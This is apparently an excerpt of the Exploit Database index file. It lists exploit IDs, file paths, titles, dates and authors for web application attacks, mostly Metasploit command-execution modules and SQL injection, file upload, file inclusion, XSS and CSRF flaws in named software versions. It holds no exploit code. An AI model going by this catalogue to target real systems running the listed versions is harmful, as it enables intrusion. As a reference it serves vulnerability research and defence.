+41784,exploits/php/webapps/41784.txt,"Pixie 1.0.4 - Arbitrary File Upload",2017-04-02,rungga_reksya,webapps,php, +16313,exploits/php/webapps/16313.rb,"FreeNAS - 'exec_raw.php' Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,webapps,php, +41801,exploits/multiple/webapps/41801.html,"Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window",2017-04-04,"Google Security Research",webapps,multiple, +41802,exploits/multiple/webapps/41802.html,"Apple WebKit 10.0.2 (12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",webapps,multiple, +41803,exploits/multiple/webapps/41803.html,"Apple WebKit 10.0.2 (12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion",2017-04-04,"Google Security Research",webapps,multiple, +41799,exploits/multiple/webapps/41799.html,"Apple WebKit 10.0.2(12602.3.12.0.1) - 'Frame::setDocument (1)' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",webapps,multiple, +41800,exploits/multiple/webapps/41800.html,"Apple Webkit - 'JSCallbackData' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",webapps,multiple, +16788,exploits/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,webapps,cfm, +16856,exploits/cgi/webapps/16856.rb,"DD-WRT HTTPd Daemon/Service - Arbitrary Command Execution (Metasploit)",2010-07-07,Metasploit,webapps,cgi, +16857,exploits/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise - masterCGI Arbitrary Command Execution (Metasploit)",2010-10-05,Metasploit,webapps,cgi, +16858,exploits/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package - 'passwd.php3' Arbitrary Command Execution (Metasploit)",2010-10-18,Metasploit,webapps,php, +41782,exploits/hardware/webapps/41782.txt,"Zyxel_ EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection",2017-04-02,"trevor Hough",webapps,hardware, +16881,exploits/php/webapps/16881.rb,"Cacti - 'graph_view.php' Remote Command Execution (Metasploit)",2010-07-03,Metasploit,webapps,php, +16882,exploits/php/webapps/16882.rb,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit)",2010-07-25,Metasploit,webapps,php, +16883,exploits/php/webapps/16883.rb,"Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)",2010-07-25,Metasploit,webapps,php, +16885,exploits/php/webapps/16885.rb,"TikiWiki jhot - Remote Command Execution (Metasploit)",2010-07-25,Metasploit,webapps,php, +16886,exploits/cgi/webapps/16886.rb,"AWStats 6.4 < 6.5 - migrate Remote Command Execution (Metasploit)",2010-07-03,Metasploit,webapps,cgi, +16889,exploits/linux/webapps/16889.rb,"Redmine SCM Repository 0.9.x/1.0.x - Arbitrary Command Execution (Metasploit)",2011-01-08,Metasploit,webapps,linux, +16890,exploits/php/webapps/16890.rb,"phpBB - 'viewtopic.php' Arbitrary Code Execution (Metasploit)",2010-07-03,Metasploit,webapps,php, +16891,exploits/cgi/webapps/16891.rb,"QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)",2010-07-03,Metasploit,webapps,cgi, +16892,exploits/php/webapps/16892.rb,"TWiki History TWikiUsers - 'rev' Command Execution (Metasploit)",2010-07-03,Metasploit,webapps,php, +16893,exploits/cgi/webapps/16893.rb,"Barracuda - IMG.pl Remote Command Execution (Metasploit)",2010-04-30,Metasploit,webapps,cgi, +16894,exploits/php/webapps/16894.rb,"TWiki - Search Function Arbitrary Command Execution (Metasploit)",2010-07-03,Metasploit,webapps,php, +16895,exploits/php/webapps/16895.rb,"WordPress 1.5.1.3 - 'cache_lastpostdate' Arbitrary Code Execution (Metasploit)",2010-07-03,Metasploit,webapps,php, +16896,exploits/php/webapps/16896.rb,"vBulletin - 'misc.php' Template Name Arbitrary Code Execution (Metasploit)",2010-07-25,Metasploit,webapps,php, +16897,exploits/php/webapps/16897.rb,"BASE - 'base_qry_common' Remote File Inclusion (Metasploit)",2010-11-24,Metasploit,webapps,php, +16899,exploits/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution (Metasploit)",2010-07-03,Metasploit,webapps,php, +16901,exploits/php/webapps/16901.rb,"PAJAX - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,webapps,php, +16902,exploits/php/webapps/16902.rb,"CakePHP 1.3.5/1.2.8 - Cache Corruption (Metasploit)",2011-01-14,Metasploit,webapps,php, +16904,exploits/php/webapps/16904.rb,"Fonality trixbox CE 2.6.1 - 'langChoice' Local File Inclusion (Metasploit)",2011-01-08,Metasploit,webapps,php, +16905,exploits/cgi/webapps/16905.rb,"AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit)",2009-12-26,Metasploit,webapps,cgi, +16906,exploits/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,webapps,php, +16907,exploits/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,webapps,hardware, +16908,exploits/cgi/webapps/16908.rb,"Nagios3 - 'statuswml.cgi' 'Ping' Command Execution (Metasploit)",2010-07-14,Metasploit,webapps,cgi, +16909,exploits/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - 'picEditor.php' Command Execution (Metasploit)",2010-07-03,Metasploit,webapps,php, +16911,exploits/php/webapps/16911.rb,"TikiWiki tiki-graph_formula - PHP Remote Code Execution (Metasploit)",2010-09-20,Metasploit,webapps,php, +16912,exploits/php/webapps/16912.rb,"Mambo - Cache_Lite Class MosConfig_absolute_path Remote File Inclusion (Metasploit)",2010-11-24,Metasploit,webapps,php, +16913,exploits/php/webapps/16913.rb,"phpMyAdmin - Config File Code Injection (Metasploit)",2010-07-03,Metasploit,webapps,php, +16914,exploits/cgi/webapps/16914.rb,"The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)",2010-07-03,Metasploit,webapps,cgi, +16917,exploits/php/webapps/16917.rb,"Dogfood CRM - 'spell.php' Remote Command Execution (Metasploit)",2010-07-03,Metasploit,webapps,php, +16923,exploits/hardware/webapps/16923.rb,"ContentKeeper Web - Remote Command Execution (Metasploit)",2010-10-09,Metasploit,webapps,hardware, +16931,exploits/php/webapps/16931.html,"N-13 News 4.0 - Cross-Site Request Forgery (Add Admin)",2011-03-06,AtT4CKxT3rR0r1ST,webapps,php, +16946,exploits/php/webapps/16946.txt,"Ruubikcms 1.0.3 - Multiple Vulnerabilities",2011-03-08,"Khashayar Fereidani",webapps,php, +16933,exploits/php/webapps/16933.txt,"Quick Polls - Local File Inclusion / Deletion",2011-03-06,"Mark Stanislav",webapps,php, +16934,exploits/php/webapps/16934.pl,"EggAvatar for vBulletin 3.8.x - SQL Injection",2011-03-06,DSecurity,webapps,php, +16935,exploits/php/webapps/16935.txt,"Bacula-Web 1.3.x < 5.0.3 - Multiple Vulnerabilities",2011-03-07,b0telh0,webapps,php, +16937,exploits/php/webapps/16937.pl,"EggAvatar 2.3.2 for vBulletin 3.8.x - Local File Read",2011-03-07,DSecurity,webapps,php, +16938,exploits/php/webapps/16938.txt,"BMForum Myna 6.0 - SQL Injection",2011-03-07,"Stephan Sattler",webapps,php, +16941,exploits/asp/webapps/16941.txt,"EzPub Simple Classic ASP CMS - SQL Injection",2011-03-08,p0pc0rn,webapps,asp, +16947,exploits/php/webapps/16947.txt,"WordPress Plugin GRAND Flash Album Gallery 0.55 - Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",webapps,php, +16948,exploits/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection",2011-03-09,Shamus,webapps,php, +16949,exploits/php/webapps/16949.php,"Maian Weblog 4.0 - Blind SQL Injection",2011-03-09,mr_me,webapps,php, +16950,exploits/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,"Khashayar Fereidani",webapps,php, +16953,exploits/asp/webapps/16953.txt,"Luch Web Designer - Multiple SQL Injections",2011-03-10,p0pc0rn,webapps,asp, +16954,exploits/php/webapps/16954.txt,"Keynect eCommerce - SQL Injection",2011-03-10,"Arturo Zamora",webapps,php, +16955,exploits/asp/webapps/16955.txt,"SmarterMail 7.3/7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",webapps,asp, +16959,exploits/multiple/webapps/16959.txt,"Oracle WebLogic - POST Session Fixation",2011-03-11,"Roberto Suggi Liverani",webapps,multiple, +16961,exploits/php/webapps/16961.py,"N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code",2011-03-11,TecR0c,webapps,php, +16962,exploits/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",webapps,asp, +16963,exploits/php/webapps/16963.txt,"Constructr CMS 3.03 - Multiple Remote Vulnerabilities",2011-03-11,LiquidWorm,webapps,php, +16968,exploits/php/webapps/16968.txt,"Cover Vision - SQL Injection",2011-03-13,Egyptian.H4x0rz,webapps,php, +16969,exploits/php/webapps/16969.txt,"Log1 CMS 2.0 - Multiple Vulnerabilities",2011-03-14,Aodrulez,webapps,php, +16975,exploits/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-14,"Hoyt LLC Research",webapps,asp, +16980,exploits/php/webapps/16980.py,"IF-CMS 2.07 - Unauthenticated Local File Inclusion (1)",2011-03-15,TecR0c,webapps,php, +16982,exploits/php/webapps/16982.txt,"LotusCMS 3.0.3 - Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",webapps,php, +16987,exploits/php/webapps/16987.txt,"pointter PHP content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,webapps,php, +16988,exploits/php/webapps/16988.txt,"WikiWig 5.01 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-16,"AutoSec Tools",webapps,php, +16989,exploits/php/webapps/16989.txt,"b2evolution 4.0.3 - Persistent Cross-Site Scripting",2011-03-16,"AutoSec Tools",webapps,php, +16992,exploits/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injections",2011-03-17,"Aung Khant",webapps,php, +16995,exploits/php/webapps/16995.txt,"Joomla! Component com_booklibrary - SQL Injection",2011-03-17,"Marc Doudiet",webapps,php, +16997,exploits/php/webapps/16997.txt,"Tugux CMS 1.0_final - Multiple Vulnerabilities",2011-03-17,Aodrulez,webapps,php, +17000,exploits/php/webapps/17000.txt,"Tugux CMS - 'nid' Blind SQL Injection",2011-03-18,eidelweiss,webapps,php, +17002,exploits/php/webapps/17002.txt,"CMS Loko Media - Local File Download",2011-03-18,Xr0b0t,webapps,php, +17003,exploits/php/webapps/17003.py,"iCMS 1.1 - Admin SQL Injection / Brute Force",2011-03-18,TecR0c,webapps,php, +17005,exploits/php/webapps/17005.txt,"Kleophatra 0.1.4 - Arbitrary File Upload",2011-03-19,Xr0b0t,webapps,php, +17006,exploits/php/webapps/17006.txt,"Balitbang CMS 3.3 - Multiple Vulnerabilities",2011-03-19,Xr0b0t,webapps,php, +17007,exploits/php/webapps/17007.txt,"Phpbuddies - Arbitrary File Upload",2011-03-19,Xr0b0t,webapps,php, +17009,exploits/php/webapps/17009.txt,"CMS Balitbang 3.3 - Arbitrary File Upload",2011-03-19,eidelweiss,webapps,php, +17011,exploits/asp/webapps/17011.txt,"Douran 3.9.7.8 - File Download/Source Code Disclosure",2011-03-20,"AJAX Security Team",webapps,asp, +17014,exploits/php/webapps/17014.txt,"CMS Lokomedia 1.5 - Arbitrary File Upload",2011-03-21,eidelweiss,webapps,php, +17015,exploits/asp/webapps/17015.txt,"Element-IT PowUpload 1.3 - Arbitrary File Upload",2011-03-21,"Daniel Godoy",webapps,asp, +17016,exploits/asp/webapps/17016.txt,"EAFlashUpload 2.5 - Arbitrary File Upload",2011-03-21,"Daniel Godoy",webapps,asp, +17018,exploits/php/webapps/17018.txt,"Shimbi CMS - Multiple SQL Injections",2011-03-21,p0pc0rn,webapps,php, +17026,exploits/windows/webapps/17026.txt,"Symantec LiveUpdate Administrator Management GUI - HTML Injection",2011-03-23,"Nikolas Sotiriu",webapps,windows, +17035,exploits/php/webapps/17035.pl,"Constructr CMS 3.03 - Arbitrary File Upload",2011-03-23,plucky,webapps,php, +17036,exploits/asp/webapps/17036.txt,"Web Wiz Forum - Injection",2011-03-23,eXeSoul,webapps,asp, +17046,exploits/php/webapps/17046.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (2)",2011-03-24,"High-Tech Bridge SA",webapps,php, +17050,exploits/php/webapps/17050.txt,"Family Connections CMS 2.3.2 - Persistent Cross-Site Scripting / XML Injection",2011-03-26,LiquidWorm,webapps,php, +17051,exploits/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,webapps,php, +17054,exploits/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",webapps,php, +17055,exploits/php/webapps/17055.txt,"Honey Soft Web Solution - Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,webapps,php, +17056,exploits/php/webapps/17056.txt,"WordPress Plugin BackWPup - Remote Code Execution / Local Code Execution",2011-03-28,"Sense of Security",webapps,php, +17057,exploits/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,webapps,php, +17061,exploits/php/webapps/17061.txt,"Andy's PHP KnowledgeBase 0.95.4 - SQL Injection",2011-03-29,"AutoSec Tools",webapps,php, +17062,exploits/php/webapps/17062.txt,"Claroline 1.10 - Persistent Cross-Site Scripting",2011-03-29,"AutoSec Tools",webapps,php, +17069,exploits/php/webapps/17069.txt,"oscss2 2.1.0 rc12 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",webapps,php, +17076,exploits/php/webapps/17076.txt,"YaCOMAS 0.3.6 Alpha - Multiple Vulnerabilities",2011-03-30,"Pr@fesOr X",webapps,php, +17077,exploits/php/webapps/17077.txt,"Pligg CMS 1.1.3 - Multiple Vulnerabilities",2011-03-30,"Jelmer de Hen",webapps,php, +17079,exploits/php/webapps/17079.txt,"IrIran Shoping Script - SQL Injection",2011-03-30,Net.Edit0r,webapps,php, +17080,exploits/php/webapps/17080.txt,"BigACE 2.7.5 - Arbitrary File Upload",2011-03-30,Net.Edit0r,webapps,php, +17081,exploits/asp/webapps/17081.txt,"CosmoQuest - Authentication Bypass",2011-03-30,Net.Edit0r,webapps,asp, +17084,exploits/php/webapps/17084.txt,"Andy's PHP KnowledgeBase 0.95.2 - 'viewusers.php' SQL Injection",2011-03-30,"Mark Stanislav",webapps,php, +17085,exploits/php/webapps/17085.txt,"PHPBoost 3.0 - Remote Download Backup",2011-03-31,KedAns-Dz,webapps,php, +17091,exploits/php/webapps/17091.html,"Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin) (2)",2011-04-01,AtT4CKxT3rR0r1ST,webapps,php, +17092,exploits/php/webapps/17092.html,"Allomani News 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,webapps,php, +17093,exploits/php/webapps/17093.html,"Allomani Movies Library 2.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,webapps,php, +17094,exploits/php/webapps/17094.html,"Allomani Web Links 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,webapps,php, +17095,exploits/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,webapps,php, +17096,exploits/php/webapps/17096.html,"Allomani Super MultiMedia Library 2.5.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,webapps,php, +17123,exploits/php/webapps/17123.txt,"Tutorialms 1.4 (show) - SQL Injection",2011-04-05,LiquidWorm,webapps,php, +17098,exploits/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - Cross-Site Scripting",2011-04-01,"High-Tech Bridge SA",webapps,php, +17099,exploits/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",webapps,php, +17100,exploits/php/webapps/17100.txt,"spidaNews 1.0 - 'news.php?id' SQL Injection",2011-04-02,"Easy Laster",webapps,php, +17101,exploits/php/webapps/17101.txt,"ilchClan 1.0.5 - 'regist.php' SQL Injection",2011-04-02,"Easy Laster",webapps,php, +17102,exploits/php/webapps/17102.txt,"Anzeigenmarkt 2011 - 'index.php' SQL Injection",2011-04-02,"Easy Laster",webapps,php, +17103,exploits/php/webapps/17103.txt,"Advanced Image Hosting 2.2 - 'index.php' SQL Injection",2011-04-03,keracker,webapps,php, +17106,exploits/php/webapps/17106.txt,"Rash CMS - SQL Injection",2011-04-03,keracker,webapps,php, +17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,webapps,php, +17108,exploits/php/webapps/17108.txt,"OpenCart 1.4.9 - Multiple Local File Inclusions",2011-04-03,KedAns-Dz,webapps,php, +17431,exploits/php/webapps/17431.txt,"Same Team E-shop manager - SQL Injection",2011-06-22,"Number 7",webapps,php, +17110,exploits/php/webapps/17110.txt,"DoceboLms 4.0.4 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-04-04,LiquidWorm,webapps,php, +17111,exploits/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) - Persistent / Reflective Cross-Site Scripting",2011-04-04,"Michael Brooks",webapps,multiple, +17112,exploits/hardware/webapps/17112.txt,"Encore ENPS-2012 - Cross-Site Scripting",2011-04-04,b0telh0,webapps,hardware, +17113,exploits/hardware/webapps/17113.txt,"TP-Link TL-PS110U / TL-PS110P - Cross-Site Scripting",2011-04-04,b0telh0,webapps,hardware, +17114,exploits/hardware/webapps/17114.txt,"Planex Mini-300PU & Mini100s - Cross-Site Scripting",2011-04-04,b0telh0,webapps,hardware, +17115,exploits/hardware/webapps/17115.txt,"ZO Tech Multiple Print Servers - Cross-Site Scripting",2011-04-04,b0telh0,webapps,hardware, +17116,exploits/hardware/webapps/17116.txt,"Longshine Multiple Print Servers - Cross-Site Scripting",2011-04-04,b0telh0,webapps,hardware, +17117,exploits/hardware/webapps/17117.txt,"Planet FPS-1101 - Cross-Site Scripting",2011-04-04,b0telh0,webapps,hardware, +17118,exploits/php/webapps/17118.txt,"OpenEMR 4.0.0 - Multiple Vulnerabilities",2011-04-05,"AutoSec Tools",webapps,php, +17119,exploits/php/webapps/17119.txt,"WordPress Plugin Custom Pages 0.5.0.1 - Local File Inclusion",2011-04-05,"AutoSec Tools",webapps,php, +17125,exploits/php/webapps/17125.txt,"Dream Vision Technologies Web Portal - SQL Injection",2011-04-06,eXeSoul,webapps,php, +17126,exploits/php/webapps/17126.html,"Graugon Forum 1.3 - SQL Injection",2011-04-06,"AutoSec Tools",webapps,php, +17127,exploits/php/webapps/17127.txt,"eyeos 2.3 - Multiple Vulnerabilities",2011-04-06,"AutoSec Tools",webapps,php, +17128,exploits/php/webapps/17128.txt,"greenpants 0.1.7 - Multiple Vulnerabilities",2011-04-06,"Ptrace Security",webapps,php, +17129,exploits/php/webapps/17129.txt,"S40 CMS 0.4.2b - Local File Inclusion",2011-04-07,Osirys,webapps,php, +17132,exploits/php/webapps/17132.py,"Joomla! Component com_virtuemart 1.1.7 - Blind SQL Injection",2011-04-08,"TecR0c & mr_me",webapps,php, +17134,exploits/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",webapps,php, +17135,exploits/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",webapps,php, +17136,exploits/php/webapps/17136.txt,"Joomla! Component joomlacontenteditor - Blind SQL Injection",2011-04-09,eidelweiss,webapps,php, +17137,exploits/php/webapps/17137.txt,"Nooms CMS 1.1.1 - Cross-Site Request Forgery",2011-04-09,loneferret,webapps,php, +17178,exploits/php/webapps/17178.txt,"Blue Hat - Sensitive Database Disclosure / SQL Injection",2011-04-16,^Xecuti0N3r,webapps,php, +17179,exploits/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,webapps,php, +17180,exploits/php/webapps/17180.txt,"Shape Web Solutions CMS - SQL Injection",2011-04-16,"Ashiyane Digital Security Team",webapps,php, +17141,exploits/php/webapps/17141.txt,"Point Market System 3.1x vBulletin plugin - SQL Injection",2011-04-10,Net.Edit0r,webapps,php, +17146,exploits/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection",2011-04-11,R3d-D3V!L,webapps,php, +17165,exploits/php/webapps/17165.py,"TinyBB 1.4 - Blind SQL Injection / Full Path Disclosure",2011-04-13,swami,webapps,php, +17170,exploits/php/webapps/17170.txt,"EZ-Shop 1.02 - Lateral SQL Injection",2011-04-14,Osirys,webapps,php, +17172,exploits/php/webapps/17172.txt,"cPassMan 1.82 - Arbitrary File Download",2011-04-15,"Sense of Security",webapps,php, +17173,exploits/php/webapps/17173.txt,"TextAds 2.08 Script - Cross-Site Scripting",2011-04-15,"Ashiyane Digital Security Team",webapps,php, +17174,exploits/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - Authenticated Local File Inclusion / Edit",2011-04-15,bitform,webapps,multiple, +17176,exploits/asp/webapps/17176.txt,"SoftXMLCMS - Arbitrary File Upload",2011-04-16,Alexander,webapps,asp, +17183,exploits/php/webapps/17183.txt,"osPHPSite - SQL Injection",2011-04-17,vir0e5,webapps,php, +17197,exploits/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injections Vulnerabilities",2011-04-22,NoNameMT,webapps,php, +17198,exploits/php/webapps/17198.txt,"360 Web Manager 3.0 - Multiple Vulnerabilities",2011-04-22,"Ignacio Garrido",webapps,php, +17190,exploits/php/webapps/17190.txt,"dalbum 1.43 - Multiple Vulnerabilities",2011-04-19,"High-Tech Bridge SA",webapps,php, +17191,exploits/php/webapps/17191.txt,"Ultimate eShop - Error-Based SQL Injection",2011-04-20,Romka,webapps,php, +17192,exploits/php/webapps/17192.html,"docuFORM Mercury WebApp 6.16a/5.20 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-20,LiquidWorm,webapps,php, +17193,exploits/php/webapps/17193.html,"SocialCMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-04-20,vir0e5,webapps,php, +17200,exploits/php/webapps/17200.txt,"ZenPhoto 1.4.0.3 - x-forwarded-for HTTP Header Persistent Cross-Site Scripting",2011-04-22,Saif,webapps,php, +17202,exploits/php/webapps/17202.txt,"Dolibarr ERP/CRM 3.0.0 - Multiple Vulnerabilities",2011-04-22,"AutoSec Tools",webapps,php, +17203,exploits/php/webapps/17203.txt,"Web2Project 2.3 - SQL Injection",2011-04-22,"AutoSec Tools",webapps,php, +17204,exploits/php/webapps/17204.txt,"DynMedia Pro Web CMS 4.0 - Local File Disclosure",2011-04-22,Mbah_Semar,webapps,php, +17205,exploits/php/webapps/17205.txt,"4Images 1.7.9 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",webapps,php, +17206,exploits/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injections",2011-04-22,^Xecuti0N3r,webapps,php, +17207,exploits/php/webapps/17207.txt,"WordPress Plugin Ajax Category Dropdown 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",webapps,php, +17211,exploits/php/webapps/17211.txt,"mySeatXT 0.1781 - SQL Injection",2011-04-25,"AutoSec Tools",webapps,php, +17212,exploits/php/webapps/17212.txt,"OrangeHRM 2.6.3 - 'PluginController.php' Local File Inclusion",2011-04-25,"AutoSec Tools",webapps,php, +17213,exploits/php/webapps/17213.txt,"phpmychat plus 1.93 - Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",webapps,php, +17214,exploits/php/webapps/17214.php,"WordPress Plugin SermonBrowser 0.43 - SQL Injection",2011-04-26,Ma3sTr0-Dz,webapps,php, +17215,exploits/hardware/webapps/17215.txt,"Snom IP Phone Web Interface < 8 - Multiple Vulnerabilities",2011-04-26,"Yakir Wizman",webapps,hardware, +17216,exploits/php/webapps/17216.txt,"Quick.CMS 3.0 - Cross-Site Request Forgery",2011-04-26,^Xecuti0N3r,webapps,php, +17218,exploits/php/webapps/17218.txt,"Symphony CMS 2.1.2 - Blind SQL Injection",2011-04-27,Wireghoul,webapps,php, +17220,exploits/php/webapps/17220.txt,"eyeos 1.9.0.2 - Persistent Cross-Site Scripting Using Image Files",2011-04-28,"Alberto Ortega",webapps,php, +17221,exploits/php/webapps/17221.txt,"kusaba x 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",webapps,php, +17226,exploits/php/webapps/17226.txt,"phpGraphy 0.9.13b - Multiple Vulnerabilities",2011-04-29,"High-Tech Bridge SA",webapps,php, +17228,exploits/asp/webapps/17228.txt,"SOOP Portal Raven 1.0b - SQL Injection",2011-04-29,Evil-Thinker,webapps,asp, +17231,exploits/php/webapps/17231.txt,"Parnian Opendata CMS - SQL Injection",2011-05-02,Alexander,webapps,php, +17319,exploits/php/webapps/17319.txt,"Tickets 2.13 - SQL Injection",2011-05-25,"AutoSec Tools",webapps,php, +17235,exploits/php/webapps/17235.html,"Exponent CMS 2.0 Beta 1.1 - Cross-Site Request Forgery (Add Administrator Account) (PoC)",2011-05-02,outlaw.dll,webapps,php, +17236,exploits/php/webapps/17236.txt,"Travel411 - SQL Injection",2011-05-02,Caddy-Dz,webapps,php, +17237,exploits/php/webapps/17237.txt,"Horizon Web Builder - 'fshow.php' SQL Injection",2011-05-03,"Iolo Morganwg",webapps,php, +17238,exploits/php/webapps/17238.html,"Front Accounting 2.3.4 - Cross-Site Request Forgery",2011-05-03,"AutoSec Tools",webapps,php, +17239,exploits/php/webapps/17239.txt,"Time and Expense Management System - Multiple Vulnerabilities",2011-05-03,"AutoSec Tools",webapps,php, +17242,exploits/asp/webapps/17242.txt,"Sothink DHTML Menu - SQL Injection",2011-05-04,Caddy-Dz,webapps,asp, +17248,exploits/php/webapps/17248.txt,"PHPDug 2.0.0 - Multiple Vulnerabilities",2011-05-06,"High-Tech Bridge SA",webapps,php, +17250,exploits/php/webapps/17250.txt,"phpThumb - 'phpThumbDebug' Information Disclosure",2011-05-06,mook,webapps,php, +17251,exploits/php/webapps/17251.html,"VCalendar 1.1.5 - Cross-Site Request Forgery",2011-05-06,"High-Tech Bridge SA",webapps,php, +17259,exploits/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal",2011-05-07,"Raffaele Forte",webapps,cgi, +17264,exploits/php/webapps/17264.txt,"Joomla! Component com_versioning - SQL Injection",2011-05-09,the_cyber_nuxbie,webapps,php, +17265,exploits/php/webapps/17265.txt,"Joomla! Component com_hello - SQL Injection",2011-05-09,the_cyber_nuxbie,webapps,php, +17267,exploits/php/webapps/17267.txt,"Traidnt UP 2.0 - 'view.php' SQL Injection",2011-05-10,ScOrPiOn,webapps,php, +17276,exploits/windows/webapps/17276.txt,"Oracle GlassFish Server - Administration Console Authentication Bypass",2011-05-12,"Core Security",webapps,windows, +17284,exploits/php/webapps/17284.txt,"WordPress Plugin EditorMonkey 2.5 - 'FCKeditor' Arbitrary File Upload",2011-05-14,kaMtiEz,webapps,php, +17285,exploits/php/webapps/17285.php,"osCommerce 2.3.1 - 'banner_manager.php' Arbitrary File Upload",2011-05-14,"Number 7",webapps,php, +17288,exploits/php/webapps/17288.txt,"Joomla! Component com_question - SQL Injection",2011-05-15,"NeX HaCkEr",webapps,php, +17289,exploits/php/webapps/17289.txt,"frame-oshop - SQL Injection",2011-05-15,-SmoG-,webapps,php, +17292,exploits/php/webapps/17292.txt,"MediaInSpot CMS - Local File Inclusion (2)",2011-05-16,"wlhaan haker",webapps,php, +17293,exploits/php/webapps/17293.txt,"MediaInSpot CMS - SQL Injection",2011-05-16,"Iolo Morganwg",webapps,php, +17295,exploits/php/webapps/17295.txt,"Vanilla Forum 2.0.17.9 - Local File Inclusion",2011-05-16,"AutoSec Tools",webapps,php, +17296,exploits/php/webapps/17296.txt,"NoticeBoardPro 1.0 - Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",webapps,php, +17297,exploits/php/webapps/17297.txt,"Jcow 4.2.1 - Local File Inclusion",2011-05-16,"AutoSec Tools",webapps,php, +17299,exploits/php/webapps/17299.txt,"WordPress Plugin Is-human 1.4.2 - Remote Command Execution",2011-05-17,neworder,webapps,php, +17301,exploits/php/webapps/17301.txt,"Pligg CMS 1.1.4 - SQL Injection",2011-05-17,Null-0x00,webapps,php, +17303,exploits/php/webapps/17303.txt,"Joomla! Component jDownloads 1.0 - Arbitrary File Upload",2011-05-18,Al-Ghamdi,webapps,php, +17307,exploits/php/webapps/17307.txt,"Ultimate PHP Board 2.2.7 - Broken Authentication and Session Management",2011-05-20,i2sec,webapps,php, +17308,exploits/php/webapps/17308.txt,"Zen Cart 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",webapps,php, +17309,exploits/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",webapps,php, +17311,exploits/php/webapps/17311.txt,"E-Manage MySchool 7.02 - SQL Injection",2011-05-21,az7rb,webapps,php, +17312,exploits/php/webapps/17312.txt,"Tugux CMS 1.2 - Multiple Vulnerabilities",2011-05-22,LiquidWorm,webapps,php, 